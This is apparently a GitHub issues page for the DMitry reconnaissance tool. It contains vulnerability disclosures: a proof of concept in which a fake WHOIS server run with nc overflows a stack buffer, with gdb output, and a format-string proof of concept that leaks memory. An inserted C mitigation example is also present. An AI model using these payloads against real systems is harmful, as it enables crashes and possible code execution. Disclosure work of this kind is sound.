jaygreig86 / dmitry
DMitry (Deepmagic Information Gathering Tool)
Home Page: http://www.mor-pah.net
License: GNU General Public License v2.0
Did not dig into it, but some domains - like pftech.xyz - provoke a segmentation fault.
Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.
This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.
PoC:
For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:
127.0.0.1 Af.whois-servers.net
Next, I use nc to act as the WHOIS server:
echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43
While that's running, let's see what happens in DMitry:
$ gdb ./dmitry
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf
Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU
Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141 if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0 0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1 0x4141555555557dfc in ?? ()
#2 0x4141414141414141 in ?? ()
#3 0x41417fffffffe240 in ?? ()
#4 0x4e206e69616d6f44 in ?? ()
#5 0x6f6f66203a656d61 in ?? ()
#6 0x206e69616d6f440a in ?? ()
#7 0x203a737574617453 in ?? ()
#8 0x414141410a726162 in ?? ()
#9 0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]
Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.
Would it be possible to create a release for 1.3a?
I realize this repository is no longer being actively maintained, but for those who still find the program useful, be aware that there is a serious format string vulnerability, so please carefully validate your inputs!
PoC:
$ ./dmitry "%p %p %p %p %p %p"
Deepmagic Information Gathering Tool
"There be some deep magic going on"
ERROR: Unable to locate Host IP addr. for %p %p %p %p %p %p
Continuing with limited modules
HostIP:
HostName:%p %p %p %p %p %p
Gathered Inic-whois information for 0x5598e89e9b47 (nil) (nil) 0x7ffc2f4878e0 0x7f721845de80 (nil)
[...]
A maliciously crafted input can achieve arbitrary read/write, potentially leading to arbitrary code execution.
Root Cause:
The function get_nwhois passes linebuff, which contains content from the command line, to print_line:
Lines 3 to 28 in 5ad492c
This eventually reaches printf as the format string argument:
Lines 3 to 29 in 5ad492c
This is a very unsafe usage of printf.
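The two reports above (a WHOIS reply overflowing a fixed stack buffer in nic_format_buff, and a command-line hostname reaching printf as the format string) share one mitigation pattern: bound every copy into a fixed buffer and pass untrusted text to printf only as an argument. The following is an added illustration of that pattern, not dmitry's code; the function names, the 256-byte LINE_MAX_LEN and the sample inputs are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hypothetical hardened line handling (added example, not dmitry's code). */
#define LINE_MAX_LEN 256

/* Copy one line (up to '\n' or NUL) from src into a fixed-size buffer.
 * Returns the bytes consumed from src (newline included) and sets
 * *truncated when the line did not fit; dst is always NUL-terminated
 * and never written past dstsz bytes (dstsz must be >= 1). */
size_t copy_line_bounded(const char *src, char *dst, size_t dstsz, bool *truncated)
{
    size_t n = 0, w = 0;
    *truncated = false;
    while (src[n] != '\0' && src[n] != '\n') {
        if (w + 1 < dstsz)
            dst[w++] = src[n];
        else
            *truncated = true;   /* keep consuming, stop writing */
        n++;
    }
    dst[w] = '\0';
    if (src[n] == '\n') n++;
    return n;
}

/* Emit an untrusted line as a printf argument, never as the format string,
 * so "%p %p" in a hostname or WHOIS reply is printed literally. */
void print_line_safe(const char *line)
{
    printf("%s\n", line);
}

/* Consume a whole WHOIS response line by line; returns how many lines
 * had to be truncated (a useful signal to log). */
int process_whois_response(const char *resp)
{
    char line[LINE_MAX_LEN];
    int truncated_lines = 0;
    bool trunc;
    while (*resp != '\0') {
        resp += copy_line_bounded(resp, line, sizeof line, &trunc);
        if (trunc) truncated_lines++;
        print_line_safe(line);
    }
    return truncated_lines;
}
```

An over-long line such as the run of A's in the PoC is cut to 255 bytes and counted rather than smashing the stack, and a "%p %p" hostname comes out as plain text.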
I get the following error when I issue the following command. The error is generated in the middle of the process.
dmitry -winsepo hackthissite.txt hackthissite.org
Error:
*** buffer overflow detected ***: dmitry terminated
Segmentation fault
I'm trying to read banners from a host in my local network and came across this problem.
System: Linux kali 6.0.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.10-2kali1 (2022-12-06) x86_64 GNU/Linux, VM running on VirtualBox
Error: zsh: segmentation fault dmitry -bp 192.168.15.1
@jaygreig86 Can you make dmitry run on Windows?